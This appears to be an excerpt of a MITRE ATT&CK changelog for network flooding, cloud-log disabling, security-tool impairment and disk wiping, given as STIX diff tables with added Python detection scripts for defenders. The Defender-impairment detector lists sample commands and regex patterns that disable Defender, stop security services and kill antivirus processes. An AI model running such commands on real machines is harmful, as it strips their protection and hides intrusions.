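The description makes the point that in a distributed flood each sender contributes little, so per-source rate limits miss it; what stands out is the number of distinct sources converging on one destination, which is what the entry's Network Traffic Flow data source (NetFlow, per the Cisco citation) exposes. The following is an added example, not code from the ATT&CK entry or the cited sources: it aggregates constructed flow records per destination and port and reports destinations that exceed assumed source-count and packet-count thresholds, while leaving a high-volume transfer from a handful of clients alone.

```python
"""Added example: aggregate NetFlow-style records per destination and surface
destinations hit by many distinct sources at once. Flows are constructed;
thresholds are assumptions to tune against your own baseline."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    proto: str
    packets: int
    octets: int


def flood_candidates(flows, min_sources=50, min_packets=100_000):
    """Group by (dst, dport); report groups with >= min_sources distinct senders and
    >= min_packets packets. Average packet size is reported but not used as a filter:
    bare UDP/ICMP floods are small-packet, reflected/amplified ones are large."""
    agg = defaultdict(lambda: {"sources": set(), "packets": 0, "octets": 0, "protos": set()})
    for f in flows:
        a = agg[(f.dst, f.dport)]
        a["sources"].add(f.src)
        a["packets"] += f.packets
        a["octets"] += f.octets
        a["protos"].add(f.proto)
    out = []
    for (dst, dport), a in agg.items():
        if len(a["sources"]) >= min_sources and a["packets"] >= min_packets:
            out.append({"dst": dst, "dport": dport, "protos": sorted(a["protos"]),
                        "sources": len(a["sources"]), "packets": a["packets"],
                        "avg_bytes": round(a["octets"] / a["packets"], 1)})
    return sorted(out, key=lambda r: -r["packets"])


def build_sample_flows():
    """Constructed: 600 senders in the 198.18.0.0/15 benchmarking range flood
    192.0.2.10:53 with 60-byte UDP packets; three clients move bulk HTTPS traffic
    to 192.0.2.20:443 (more packets in total, but only three sources)."""
    flows = []
    for i in range(600):
        flows.append(Flow(f"198.18.{i // 256}.{i % 256}", "192.0.2.10", 53, "udp", 400, 400 * 60))
    for i in range(3):
        flows.append(Flow(f"10.1.0.{i + 1}", "192.0.2.20", 443, "tcp", 200_000, 200_000 * 1400))
    flows.append(Flow("10.1.0.9", "192.0.2.10", 53, "udp", 20, 20 * 80))  # one normal DNS client
    return flows


SAMPLE_FLOWS = build_sample_flows()
```

With the default thresholds only the DNS destination is reported (601 sources, about 240k packets, 60-byte average); the HTTPS destination carries more packets but from three sources and is ignored. Lowering `min_sources` to 2 shows how quickly the source-count axis stops discriminating, which is the "exceedingly difficult" case the description refers to.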
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. | |
| external_references | CAPEC-125 | |
| external_references | CAPEC-486 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-125 | |
| external_references | CAPEC-486 | |
| external_references | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:11:56.727000+00:00 | 2022-04-19 23:28:52.908000+00:00 |
| description | Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) | Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) |
| external_references[1]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/125.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[2]['source_name'] | capec | USNYAG IranianBotnet March 2016 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/486.html | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged |
| external_references[3]['source_name'] | USNYAG IranianBotnet March 2016 | capec |
| external_references[3]['url'] | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged | https://capec.mitre.org/data/definitions/125.html |
| external_references[4]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[4]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/486.html |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Sensor Health: Host Status |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) |
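The example in the description is an adversary with enough permissions disabling CloudTrail or its CloudWatch integration before doing anything else. The script below is an added example (not code from the ATT&CK entry or from the cited Sumo Logic post) of the detection that follows from it: the API call that stops a trail is itself recorded by that trail before it goes quiet, so the last events before silence are where to look. It scans constructed CloudTrail records (real field names, placeholder account and ARN values) for calls that stop, delete or narrow logging, and only flags the conditional calls (`UpdateTrail`, `PutEventSelectors`, `PutRetentionPolicy`) when their parameters actually reduce coverage.

```python
"""Added example: find CloudTrail records that switch off or narrow logging.
Records are constructed in the CloudTrail JSON shape; the account number
and ARNs are placeholders."""
import json

# Calls that reduce what CloudTrail / CloudWatch Logs will capture.
TAMPER = {
    "cloudtrail.amazonaws.com": {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"},
    "logs.amazonaws.com": {"DeleteLogGroup", "DeleteLogStream",
                           "DeleteSubscriptionFilter", "PutRetentionPolicy"},
}


def _narrows_coverage(name: str, params: dict) -> bool:
    """Only flag the conditional calls when the parameters really reduce coverage."""
    if name == "UpdateTrail":
        return (params.get("isMultiRegionTrail") is False
                or params.get("includeGlobalServiceEvents") is False)
    if name == "PutEventSelectors":
        for sel in params.get("eventSelectors", []):
            if sel.get("includeManagementEvents") is False or sel.get("readWriteType") == "ReadOnly":
                return True
        return False
    if name == "PutRetentionPolicy":
        return params.get("retentionInDays", 9999) < 7
    return True  # StopLogging, DeleteTrail, DeleteLogGroup, ... always warrant an alert


def detect_log_tampering(records: list) -> list:
    """One finding per record that disables or narrows logging."""
    out = []
    for r in records:
        src, name = r.get("eventSource"), r.get("eventName")
        if name not in TAMPER.get(src, ()):
            continue
        params = r.get("requestParameters") or {}
        if not _narrows_coverage(name, params):
            continue
        out.append({"time": r.get("eventTime"), "eventName": name,
                    "actor": r.get("userIdentity", {}).get("arn"),
                    "sourceIP": r.get("sourceIPAddress"),
                    "target": params.get("name") or params.get("trailName")
                    or params.get("logGroupName")})
    return out


def detect_from_json(text: str) -> list:
    """Entry point for a raw CloudTrail log file: {"Records": [...]}."""
    return detect_log_tampering(json.loads(text)["Records"])


# Constructed CloudTrail records (fields trimmed to those used above).
SAMPLE_RECORDS = [
    {"eventTime": "2022-03-08T21:40:01Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DescribeTrails", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/auditor"},
     "sourceIPAddress": "10.0.0.5", "requestParameters": None},
    {"eventTime": "2022-03-08T21:41:13Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/Admin/session"},
     "sourceIPAddress": "203.0.113.77", "requestParameters": {"name": "org-trail"}},
    {"eventTime": "2022-03-08T21:41:20Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/auditor"},
     "sourceIPAddress": "10.0.0.5",
     "requestParameters": {"name": "org-trail", "isMultiRegionTrail": True}},
    {"eventTime": "2022-03-08T21:42:02Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "PutEventSelectors",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/Admin/session"},
     "sourceIPAddress": "203.0.113.77",
     "requestParameters": {"trailName": "org-trail", "eventSelectors": [
         {"readWriteType": "ReadOnly", "includeManagementEvents": False}]}},
    {"eventTime": "2022-03-08T21:43:30Z", "eventSource": "logs.amazonaws.com",
     "eventName": "DeleteLogGroup",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/Admin/session"},
     "sourceIPAddress": "203.0.113.77",
     "requestParameters": {"logGroupName": "/aws/cloudtrail/org-trail"}},
]
SAMPLE_JSON = json.dumps({"Records": SAMPLE_RECORDS})
```

The read-only `DescribeTrails` and the `UpdateTrail` that keeps the trail multi-region produce nothing; `StopLogging`, the `PutEventSelectors` that drops management events, and the `DeleteLogGroup` are reported, all from the same assumed-role session and source address, which is the pivot for the rest of the investigation. Because a stopped trail no longer delivers to the bucket, run this over the CloudWatch Logs stream or an organization trail in a separate account rather than only over the trail being attacked.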
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-15 16:43:04.273000+00:00 | 2022-03-08 21:55:27.505000+00:00 |
| description | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) | An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) |
| x_mitre_contributors[2] | Sekhar Sarukkai, McAfee | Sekhar Sarukkai, McAfee |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware) Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) |
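The new description adds three behaviours (disabling updates, loading a rootkit-removal driver such as GMER, and exploiting drivers to reach kernel space), and the data-source changes below it reorder and add the telemetry that sees them: process termination, registry key modification and deletion, command execution, driver load and service metadata. The following is an added example, not code from the ATT&CK entry or from the ransomware reports it cites: one rule per data source, run over constructed endpoint events. Process names (`MsMpEng.exe`, `NisSrv.exe`, `MsSense.exe`), service names (`WinDefend`, `Sense`, `wuauserv`), the `DisableAntiSpyware` and `DisableRealtimeMonitoring` policy values and the `Set-MpPreference` cmdlet are Microsoft Defender's real identifiers; the `gmer` file-name fragment used for the driver rule is an assumption.

```python
"""Added example: map this technique's data sources (process termination,
registry modification, command execution, driver load, service metadata) to
concrete checks over constructed endpoint events. The GMER driver file name
is an assumption used only for the name-match rule."""
import re
from pathlib import PureWindowsPath

SECURITY_PROCESSES = {"msmpeng.exe", "nissrv.exe", "mssense.exe"}  # extend per product
SECURITY_SERVICES = {"windefend", "sense", "wuauserv"}  # AV engine, MDE sensor, Windows Update
DEFENDER_KILL_SWITCHES = {"disableantispyware", "disablerealtimemonitoring"}
SUSPICIOUS_DRIVER_NAMES = ("gmer",)  # assumed file-name fragment for the GMER driver

COMMAND_RULES = [
    ("Set-MpPreference disables a Defender feature",
     re.compile(r"set-mppreference\b.*-disable\w+\s+\$?true", re.I)),
    ("security/update service stopped or reconfigured",
     re.compile(r"\b(?:sc(?:\.exe)?|net(?:\.exe)?)\s+(?:stop|config)\s+(?:windefend|sense|wuauserv)\b", re.I)),
    ("taskkill against security process",
     re.compile(r"taskkill\b.*\b(?:msmpeng|nissrv|mssense)\b", re.I)),
]


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict):
    """Return a reason string when the event looks like defense impairment, else None."""
    kind = ev.get("type")
    if kind == "process_terminate" and _basename(ev.get("target", "")) in SECURITY_PROCESSES:
        return f"terminated {_basename(ev['target'])} via {_basename(ev.get('image', ''))}"
    if kind == "registry_set" and "windows defender" in ev.get("key", "").lower() \
            and ev.get("value", "").lower() in DEFENDER_KILL_SWITCHES and ev.get("data") == 1:
        return f"registry kill switch {ev['value']}=1"
    if kind == "command":
        for label, rx in COMMAND_RULES:
            if rx.search(ev.get("cmdline", "")):
                return label
    if kind == "driver_load":
        name = _basename(ev.get("image", ""))
        if not ev.get("signed", True):
            return f"unsigned driver loaded: {name}"
        if any(fragment in name for fragment in SUSPICIOUS_DRIVER_NAMES):
            return f"rootkit-removal driver loaded: {name}"
    if kind == "service_config" and ev.get("service", "").lower() in SECURITY_SERVICES \
            and ev.get("start_type", "").lower() == "disabled":
        return f"service {ev['service']} set to disabled"
    return None


def find_impairment(events: list) -> list:
    return [{"host": ev.get("host"), "user": ev.get("user"), "reason": reason}
            for ev in events if (reason := check_event(ev))]


# Constructed telemetry (Sysmon/EDR-like, reduced to the fields used).
SAMPLE_EVENTS = [
    {"type": "process_terminate", "host": "ws01", "user": "CORP\\bob",
     "image": r"C:\Windows\System32\taskkill.exe",
     "target": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5\MsMpEng.exe"},
    {"type": "registry_set", "host": "ws01", "user": "NT AUTHORITY\\SYSTEM",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender",
     "value": "DisableAntiSpyware", "data": 1},
    {"type": "command", "host": "ws01", "user": "CORP\\bob",
     "cmdline": "powershell.exe -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "command", "host": "ws02", "user": "CORP\\alice", "cmdline": "sc query WinDefend"},
    {"type": "driver_load", "host": "ws01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Users\bob\AppData\Local\Temp\gmer64.sys", "signed": False},
    {"type": "command", "host": "ws01", "user": "CORP\\bob",
     "cmdline": "sc config wuauserv start= disabled"},
    {"type": "service_config", "host": "ws01", "user": "CORP\\bob",
     "service": "WinDefend", "start_type": "Disabled"},
    {"type": "process_terminate", "host": "ws02", "user": "CORP\\alice",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]
```

Six of the eight constructed events are reported; the read-only `sc query` and a browser closing its own process are not. The rules are deliberately per data source so that losing one feed (for example an EDR whose own telemetry has been tampered with) still leaves the registry, service and driver-load views; the `signed` check is what catches a driver dropped in a user's Temp directory regardless of what it is called.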
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
| external_references | CAPEC-578 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 21:27:48.159000+00:00 | 2022-10-24 15:23:59.433000+00:00 |
| description | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware) Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) |
| external_references[1]['source_name'] | capec | OutFlank System Calls |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/578.html | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ |
| external_references[2]['source_name'] | OutFlank System Calls | chasing_avaddon_ransomware |
| external_references[2]['description'] | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. | Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022. |
| external_references[2]['url'] | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ | https://www.mandiant.com/resources/chasing-avaddon-ransomware |
| external_references[3]['source_name'] | MDSec System Calls | doppelpaymer_crowdstrike |
| external_references[3]['description'] | MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021. | Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022. |
| external_references[3]['url'] | https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/ |
| x_mitre_data_sources[0] | Process: Process Termination | Windows Registry: Windows Registry Key Deletion |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | Driver: Driver Load |
| x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Deletion | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Service: Service Metadata |
| x_mitre_data_sources[4] | Service: Service Metadata | Command: Command Execution |
| x_mitre_data_sources[5] | Sensor Health: Host Status | Process: Process Termination |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'avoslocker_ransomware', 'description': 'Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.', 'url': 'https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html'} | |
| external_references | {'source_name': 'dharma_ransomware', 'description': 'Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.', 'url': 'https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/'} | |
| external_references | {'source_name': 'MDSec System Calls', 'description': 'MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.', 'url': 'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/'} | |
| external_references | {'source_name': 'SCADAfence_ransomware', 'description': 'Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.', 'url': 'https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf'} | |
| external_references | {'source_name': 'demystifying_ryuk', 'description': 'Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.', 'url': 'https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/578.html', 'external_id': 'CAPEC-578'} | |
| x_mitre_contributors | Daniel Feichter, @VirtualAllocEx, Infosec Tirol | |
| x_mitre_contributors | Lucas Heiligenstein | |
| x_mitre_contributors | Cian Heasley | |
| x_mitre_contributors | Alex Soler, AttackIQ | |
| x_mitre_contributors | Sarathkumar Rajendran, Microsoft Defender365 | |
| x_mitre_data_sources | Sensor Health: Host Status |
| Description |
|---|
| Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM', 'root', 'Administrator', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 22:53:20.162000+00:00 | 2022-07-28 18:55:35.989000+00:00 |
| external_references[1]['source_name'] | Novetta Blockbuster | DOJ Lazarus Sony 2018 |
| external_references[1]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. |
| external_references[1]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://www.justice.gov/opa/press-release/file/1092091/download |
| external_references[2]['url'] | https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| external_references[3]['source_name'] | DOJ Lazarus Sony 2018 | Novetta Blockbuster |
| external_references[3]['description'] | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[3]['url'] | https://www.justice.gov/opa/press-release/file/1092091/download | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| x_mitre_data_sources[0] | Process: Process Creation | Driver: Driver Load |
| x_mitre_data_sources[1] | Command: Command Execution | Drive: Drive Modification |
| x_mitre_data_sources[2] | Driver: Driver Load | Drive: Drive Access |
| x_mitre_data_sources[3] | Drive: Drive Access | Process: Process Creation |
| x_mitre_data_sources[4] | Drive: Drive Modification | Command: Command Execution |
| Description |
|---|
| Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) |
| STIX Field | Old value | New value |
